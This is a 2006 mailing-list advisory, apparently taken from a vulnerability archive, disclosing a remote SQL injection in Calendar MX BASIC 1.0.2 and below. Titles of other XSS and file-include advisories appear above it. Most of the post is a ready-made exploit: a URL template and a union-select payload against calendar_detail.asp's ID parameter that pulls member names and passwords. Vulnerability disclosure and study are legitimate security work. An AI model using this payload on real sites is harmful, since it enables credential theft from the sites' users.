Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA23444] a-blog Cross-Site Scripting Vulnerability

[SA23457] opentaps "SEARCH_STRING" Cross-Site Scripting Vulnerability

b2 - 0.5 * [index] Remote File Include Vulnerability

Okul Merkezi Portal v1.0 Remote File IncLude Vuln.

From:	ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:	25.12.2006
Subject:	Title : Calendar MX BASIC <= 1.0.2 (ID) Remote SQL Injection Vulnerability

*******************************************************************************
# Title   :  Calendar MX BASIC <= 1.0.2 (ID) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# $$      :  Free

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//calendar_detail.asp?ID=[SQL]

Example:

//calendar_detail.asp?ID=-1%20union%20select%200,M_FIRST,M_PASSWORD,
0,0,0,0,0,0,0,0,0,0,0,
0%20from%20members%20where%20id%20like%201

[[/SQL]]

""""""""""""""
"""""""
# ajann,Turkey
# ...

# Im not Hacker!